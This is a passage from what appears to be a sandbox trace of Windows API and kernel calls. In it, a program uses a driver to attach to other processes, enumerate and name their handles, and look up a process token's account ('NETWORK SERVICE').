ObjectNameInfo=0xffffe0006a3f5044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.869] ObfDereferenceObject (Object=0xffffc00148472250) returned 0x18fffd [0264.869] IoCompleteRequest () returned 0x0 [0264.869] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.869] PsAcquireProcessExitSynchronization () returned 0x0 [0264.869] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.869] ObReferenceObjectByHandle (in: Handle=0x704, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001484bf7d0, HandleInformation=0x0) returned 0x0 [0264.869] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.869] PsReleaseProcessExitSynchronization () returned 0x2 [0264.869] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x7817b [0264.869] ObQueryNameString (in: Object=0xffffc001484bf7d0, ObjectNameInfo=0xffffe0006843c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006843c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.869] ObfDereferenceObject (Object=0xffffc001484bf7d0) returned 0x17fff [0264.869] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.869] PsAcquireProcessExitSynchronization () returned 0x0 [0264.869] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.870] ObReferenceObjectByHandle (in: Handle=0x774, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069f534d0, HandleInformation=0x0) returned 0x0 [0264.870] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.870] PsReleaseProcessExitSynchronization () returned 0x2 [0264.870] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x7817a [0264.870] ObQueryNameString (in: Object=0xffffe00069a2b060, ObjectNameInfo=0xffffe0006a0d0044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a0d0044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.870] ObfDereferenceObject (Object=0xffffe00069f534d0) returned 0x7fe9 [0264.870] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.870] PsAcquireProcessExitSynchronization () returned 0x0 [0264.870] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.870] ObReferenceObjectByHandle (in: Handle=0x77c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069f54090, HandleInformation=0x0) returned 0x0 [0264.870] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.870] PsReleaseProcessExitSynchronization () returned 0x2 [0264.870] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78179 [0264.870] ObQueryNameString (in: Object=0xffffe0006907e3f0, ObjectNameInfo=0xffffe0006840f7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006840f7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.870] ObfDereferenceObject (Object=0xffffe00069f54090) returned 0x7cb4 [0264.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x26c) returned 0x180 [0264.870] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0264.870] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe000697bb840, HandleInformation=0x0) returned 0x0 [0264.870] ObOpenObjectByPointer (in: Object=0xffffe000697bb840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000d8c) returned 0x0 [0264.870] ObfDereferenceObject (Object=0xffffe000697bb840) returned 0x48034 [0264.870] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000d8c, DesiredAccess=0x8, TokenHandle=0xffffe0006a921e00 | out: TokenHandle=0xffffe0006a921e00*=0x1a8) returned 0x0 [0264.870] ZwClose (Handle=0xffffffff80000d8c) returned 0x0 [0264.870] IoCompleteRequest () returned 0x0 [0264.870] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0264.870] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="NETWORK SERVICE", cchName=0x14d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0264.875] CloseHandle (hObject=0x1a8) returned 1 [0264.875] CloseHandle (hObject=0x180) returned 1 [0264.875] PsLookupProcessByProcessId (in: ProcessId=0x26c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.875] PsAcquireProcessExitSynchronization () returned 0x0 [0264.875] KeStackAttachProcess (in: PROCESS=0xffffe000697bb840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000697bb840, ApcState=0xffffd000b1b8e400) [0264.875] ObReferenceObjectByHandle (in: Handle=0x18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697b6520, HandleInformation=0x0) returned 0x0 [0264.875] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.875] PsReleaseProcessExitSynchronization () returned 0x2 [0264.875] ObfDereferenceObject (Object=0xffffe000697bb840) returned 0x40032 [0264.875] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3f2044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3f2044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.875] ObfDereferenceObject (Object=0xffffe000697b6520) returned 0x7fff [0264.875] IoCompleteRequest () returned 0x0 [0264.875] PsLookupProcessByProcessId (in: ProcessId=0x26c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.875] PsAcquireProcessExitSynchronization () returned 0x0 [0264.875] KeStackAttachProcess (in: PROCESS=0xffffe000697bb840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000697bb840, ApcState=0xffffd000b1b8e400) [0264.875] ObReferenceObjectByHandle (in: Handle=0x174, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697c4990, HandleInformation=0x0) returned 0x0 [0264.876] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.876] PsReleaseProcessExitSynchronization () returned 0x2 [0264.876] ObfDereferenceObject (Object=0xffffe000697bb840) returned 0x40031 [0264.876] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe00069197044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe00069197044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.876] ObfDereferenceObject (Object=0xffffe000697c4990) returned 0x7fff [0264.876] IoCompleteRequest () returned 0x0 [0264.876] PsLookupProcessByProcessId (in: ProcessId=0x26c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.876] PsAcquireProcessExitSynchronization () returned 0x0 [0264.876] KeStackAttachProcess (in: PROCESS=0xffffe000697bb840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000697bb840, ApcState=0xffffd000b1b8e400) [0264.876] ObReferenceObjectByHandle (in: Handle=0x194, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697be6c0, HandleInformation=0x0) returned 0x0 [0264.876] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.876] PsReleaseProcessExitSynchronization () returned 0x2 [0264.876] ObfDereferenceObject (Object=0xffffe000697bb840) returned 0x40030 [0264.876] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a3a0044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3a0044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.876] ObfDereferenceObject (Object=0xffffe000697be6c0) returned 0x7ffc [0264.876] IoCompleteRequest () returned 0x0 [0264.876] PsLookupProcessByProcessId (in: ProcessId=0x26c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.876] PsAcquireProcessExitSynchronization () returned 0x0 [0264.876] KeStackAttachProcess (in: PROCESS=0xffffe000697bb840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000697bb840, ApcState=0xffffd000b1b8e400) [0264.876] ObReferenceObjectByHandle (in: Handle=0x1bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697be240, HandleInformation=0x0) returned 0x0 [0264.876] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.876] PsReleaseProcessExitSynchronization () returned 0x2 [0264.876] ObfDereferenceObject (Object=0xffffe000697bb840) returned 0x4002f [0264.876] ObQueryNameString (in: Object=0xffffe000697be240, ObjectNameInfo=0xffffe0006a4397c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4397c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.876] ObfDereferenceObject (Object=0xffffe000697be240) returned 0x7ff3 [0264.876] IoCompleteRequest () returned 0x0 [0264.876] PsLookupProcessByProcessId (in: ProcessId=0x26c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.876] PsAcquireProcessExitSynchronization () returned 0x0 [0264.876] KeStackAttachProcess (in: PROCESS=0xffffe000697bb840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000697bb840, ApcState=0xffffd000b1b8e400) [0264.876] ObReferenceObjectByHandle (in: Handle=0x1c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697c1dd0, HandleInformation=0x0) returned 0x0 [0264.876] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.876] PsReleaseProcessExitSynchronization () returned 0x2 [0264.876] ObfDereferenceObject (Object=0xffffe000697bb840) returned 0x4002e [0264.876] ObQueryNameString (in: Object=0xffffe000697c1dd0, ObjectNameInfo=0xffffe0006914d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006914d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.876] ObfDereferenceObject (Object=0xffffe000697c1dd0) returned 0x7ffb [0264.876] IoCompleteRequest () returned 0x0 [0264.876] PsLookupProcessByProcessId (in: ProcessId=0x26c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.876] PsAcquireProcessExitSynchronization () returned 0x0 [0264.876] KeStackAttachProcess (in: PROCESS=0xffffe000697bb840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000697bb840, ApcState=0xffffd000b1b8e400) [0264.876] ObReferenceObjectByHandle (in: Handle=0x1c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697c5d00, HandleInformation=0x0) returned 0x0 [0264.876] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.876] PsReleaseProcessExitSynchronization () returned 0x2 [0264.877] ObfDereferenceObject (Object=0xffffe000697bb840) returned 0x4002d [0264.877] ObQueryNameString (in: Object=0xffffe000697c5d00, ObjectNameInfo=0xffffe0006a40c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.877] ObfDereferenceObject (Object=0xffffe000697c5d00) returned 0x7ff5 [0264.877] IoCompleteRequest () returned 0x0 [0264.877] PsLookupProcessByProcessId (in: ProcessId=0x26c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.877] PsAcquireProcessExitSynchronization () returned 0x0 [0264.877] KeStackAttachProcess (in: PROCESS=0xffffe000697bb840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000697bb840, ApcState=0xffffd000b1b8e400) [0264.877] ObReferenceObjectByHandle (in: Handle=0x1cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697c5090, HandleInformation=0x0) returned 0x0 [0264.877] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.877] PsReleaseProcessExitSynchronization () returned 0x2 [0264.877] ObfDereferenceObject (Object=0xffffe000697bb840) returned 0x4002c [0264.877] ObQueryNameString (in: Object=0xffffe000697c5090, ObjectNameInfo=0xffffe000690ef044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000690ef044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.877] ObfDereferenceObject (Object=0xffffe000697c5090) returned 0x7ffe [0264.877] IoCompleteRequest () returned 0x0 [0264.877] PsLookupProcessByProcessId (in: ProcessId=0x26c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.877] PsAcquireProcessExitSynchronization () returned 0x0 [0264.877] KeStackAttachProcess (in: PROCESS=0xffffe000697bb840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000697bb840, ApcState=0xffffd000b1b8e400) [0264.877] ObReferenceObjectByHandle (in: Handle=0x1d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697c5400, HandleInformation=0x0) returned 0x0 [0264.877] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.877] PsReleaseProcessExitSynchronization () returned 0x2 [0264.877] ObfDereferenceObject (Object=0xffffe000697bb840) returned 0x4002b [0264.877] ObQueryNameString (in: Object=0xffffe000697c5400, ObjectNameInfo=0xffffe00068a64044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a64044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.877] ObfDereferenceObject (Object=0xffffe000697c5400) returned 0x7ffc [0264.877] IoCompleteRequest () returned 0x0 [0264.877] PsLookupProcessByProcessId (in: ProcessId=0x26c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.877] PsAcquireProcessExitSynchronization () returned 0x0 [0264.877] KeStackAttachProcess (in: PROCESS=0xffffe000697bb840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000697bb840, ApcState=0xffffd000b1b8e400) [0264.877] ObReferenceObjectByHandle (in: Handle=0x1f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697c7bf0, HandleInformation=0x0) returned 0x0 [0264.877] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.877] PsReleaseProcessExitSynchronization () returned 0x2 [0264.877] ObfDereferenceObject (Object=0xffffe000697bb840) returned 0x4002a [0264.877] ObQueryNameString (in: Object=0xffffe000697c7bf0, ObjectNameInfo=0xffffe0006a40f044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40f044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.877] ObfDereferenceObject (Object=0xffffe000697c7bf0) returned 0x800f [0264.877] IoCompleteRequest () returned 0x0 [0264.877] PsLookupProcessByProcessId (in: ProcessId=0x26c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.877] PsAcquireProcessExitSynchronization () returned 0x0 [0264.877] KeStackAttachProcess (in: PROCESS=0xffffe000697bb840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000697bb840, ApcState=0xffffd000b1b8e400) [0264.877] ObReferenceObjectByHandle (in: Handle=0x1f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697c94d0, HandleInformation=0x0) returned 0x0 [0264.877] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.877] PsReleaseProcessExitSynchronization () returned 0x2 [0264.877] ObfDereferenceObject (Object=0xffffe000697bb840) returned 0x40029 [0264.877] ObQueryNameString (in: Object=0xffffe000697c94d0, ObjectNameInfo=0xffffe00069041044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00069041044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.878] ObfDereferenceObject (Object=0xffffe000697c94d0) returned 0x7ff5 [0264.878] IoCompleteRequest () returned 0x0 [0264.878] PsLookupProcessByProcessId (in: ProcessId=0x26c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.878] PsAcquireProcessExitSynchronization () returned 0x0 [0264.878] KeStackAttachProcess (in: PROCESS=0xffffe000697bb840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000697bb840, ApcState=0xffffd000b1b8e400) [0264.878] ObReferenceObjectByHandle (in: Handle=0x200, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697cbc60, HandleInformation=0x0) returned 0x0 [0264.878] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.878] PsReleaseProcessExitSynchronization () returned 0x2 [0264.878] ObfDereferenceObject (Object=0xffffe000697bb840) returned 0x40028 [0264.878] ObQueryNameString (in: Object=0xffffe00072a93060, ObjectNameInfo=0xffffe0006a4147c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a4147c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.878] ObfDereferenceObject (Object=0xffffe000697cbc60) returned 0x7ff9 [0264.878] IoCompleteRequest () returned 0x0 [0264.878] PsLookupProcessByProcessId (in: ProcessId=0x26c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.878] PsAcquireProcessExitSynchronization () returned 0x0 [0264.878] KeStackAttachProcess (in: PROCESS=0xffffe000697bb840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000697bb840, ApcState=0xffffd000b1b8e400) [0264.878] ObReferenceObjectByHandle (in: Handle=0x204, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697cf090, HandleInformation=0x0) returned 0x0 [0264.878] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.878] PsReleaseProcessExitSynchronization () returned 0x2 [0264.878] ObfDereferenceObject (Object=0xffffe000697bb840) returned 0x40027 [0264.878] ObQueryNameString (in: Object=0xffffe00072a93060, ObjectNameInfo=0xffffe0006a44d7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a44d7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.878] ObfDereferenceObject (Object=0xffffe000697cf090) returned 0x7ff1 [0264.878] IoCompleteRequest () returned 0x0 [0264.878] PsLookupProcessByProcessId (in: ProcessId=0x26c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.878] PsAcquireProcessExitSynchronization () returned 0x0 [0264.878] KeStackAttachProcess (in: PROCESS=0xffffe000697bb840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000697bb840, ApcState=0xffffd000b1b8e400) [0264.878] ObReferenceObjectByHandle (in: Handle=0x21c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697cf540, HandleInformation=0x0) returned 0x0 [0264.878] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.878] PsReleaseProcessExitSynchronization () returned 0x2 [0264.878] ObfDereferenceObject (Object=0xffffe000697bb840) returned 0x40026 [0264.878] ObQueryNameString (in: Object=0xffffe000697cf540, ObjectNameInfo=0xffffe0006a334044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a334044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.878] ObfDereferenceObject (Object=0xffffe000697cf540) returned 0x7ffe [0264.878] IoCompleteRequest () returned 0x0 [0264.878] PsLookupProcessByProcessId (in: ProcessId=0x26c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.878] PsAcquireProcessExitSynchronization () returned 0x0 [0264.878] KeStackAttachProcess (in: PROCESS=0xffffe000697bb840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000697bb840, ApcState=0xffffd000b1b8e400) [0264.878] ObReferenceObjectByHandle (in: Handle=0x220, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697cf200, HandleInformation=0x0) returned 0x0 [0264.878] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.878] PsReleaseProcessExitSynchronization () returned 0x2 [0264.878] ObfDereferenceObject (Object=0xffffe000697bb840) returned 0x40025 [0264.878] ObQueryNameString (in: Object=0xffffe000697cf200, ObjectNameInfo=0xffffe0006a3ae6c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3ae6c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.878] ObfDereferenceObject (Object=0xffffe000697cf200) returned 0x7ffe [0264.878] IoCompleteRequest () returned 0x0 [0264.878] PsLookupProcessByProcessId (in: ProcessId=0x26c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.878] PsAcquireProcessExitSynchronization () returned 0x0 [0264.878] KeStackAttachProcess (in: PROCESS=0xffffe000697bb840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000697bb840, ApcState=0xffffd000b1b8e400) [0264.879] ObReferenceObjectByHandle (in: Handle=0x22c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697d4f20, HandleInformation=0x0) returned 0x0 [0264.879] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.879] PsReleaseProcessExitSynchronization () returned 0x2 [0264.879] ObfDereferenceObject (Object=0xffffe000697bb840) returned 0x40024 [0264.879] ObQueryNameString (in: Object=0xffffe000756919d0, ObjectNameInfo=0xffffe0006a3307c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3307c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.879] ObfDereferenceObject (Object=0xffffe000697d4f20) returned 0x8000 [0264.879] IoCompleteRequest () returned 0x0 [0264.879] PsLookupProcessByProcessId (in: ProcessId=0x26c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.879] PsAcquireProcessExitSynchronization () returned 0x0 [0264.879] KeStackAttachProcess (in: PROCESS=0xffffe000697bb840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000697bb840, ApcState=0xffffd000b1b8e400) [0264.879] ObReferenceObjectByHandle (in: Handle=0x230, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697d4db0, HandleInformation=0x0) returned 0x0 [0264.879] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.879] PsReleaseProcessExitSynchronization () returned 0x2 [0264.879] ObfDereferenceObject (Object=0xffffe000697bb840) returned 0x40023 [0264.879] ObQueryNameString (in: Object=0xffffe000697d4db0, ObjectNameInfo=0xffffe0006a331244, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a331244, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.879] ObfDereferenceObject (Object=0xffffe000697d4db0) returned 0x7ffe [0264.879] IoCompleteRequest () returned 0x0 [0264.879] PsLookupProcessByProcessId (in: ProcessId=0x26c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.879] PsAcquireProcessExitSynchronization () returned 0x0 [0264.879] KeStackAttachProcess (in: PROCESS=0xffffe000697bb840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000697bb840, ApcState=0xffffd000b1b8e400) [0264.879] ObReferenceObjectByHandle (in: Handle=0x234, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697d5f20, HandleInformation=0x0) returned 0x0 [0264.879] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.879] PsReleaseProcessExitSynchronization () returned 0x2 [0264.879] ObfDereferenceObject (Object=0xffffe000697bb840) returned 0x40022 [0264.879] ObQueryNameString (in: Object=0xffffe000697d5f20, ObjectNameInfo=0xffffe0006a33d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a33d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.879] ObfDereferenceObject (Object=0xffffe000697d5f20) returned 0x7ffe [0264.879] IoCompleteRequest () returned 0x0 [0264.879] PsLookupProcessByProcessId (in: ProcessId=0x26c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.879] PsAcquireProcessExitSynchronization () returned 0x0 [0264.879] KeStackAttachProcess (in: PROCESS=0xffffe000697bb840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000697bb840, ApcState=0xffffd000b1b8e400) [0264.879] ObReferenceObjectByHandle (in: Handle=0x340, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148472250, HandleInformation=0x0) returned 0x0 [0264.879] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.879] PsReleaseProcessExitSynchronization () returned 0x2 [0264.879] ObfDereferenceObject (Object=0xffffe000697bb840) returned 0x40021 [0264.879] ObQueryNameString (in: Object=0xffffc00148472250, ObjectNameInfo=0xffffe0006a3f8044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f8044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.879] ObfDereferenceObject (Object=0xffffc00148472250) returned 0x18fffc [0264.879] IoCompleteRequest () returned 0x0 [0264.879] PsLookupProcessByProcessId (in: ProcessId=0x26c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.879] PsAcquireProcessExitSynchronization () returned 0x0 [0264.879] KeStackAttachProcess (in: PROCESS=0xffffe000697bb840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000697bb840, ApcState=0xffffd000b1b8e400) [0264.879] ObReferenceObjectByHandle (in: Handle=0x354, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148472250, 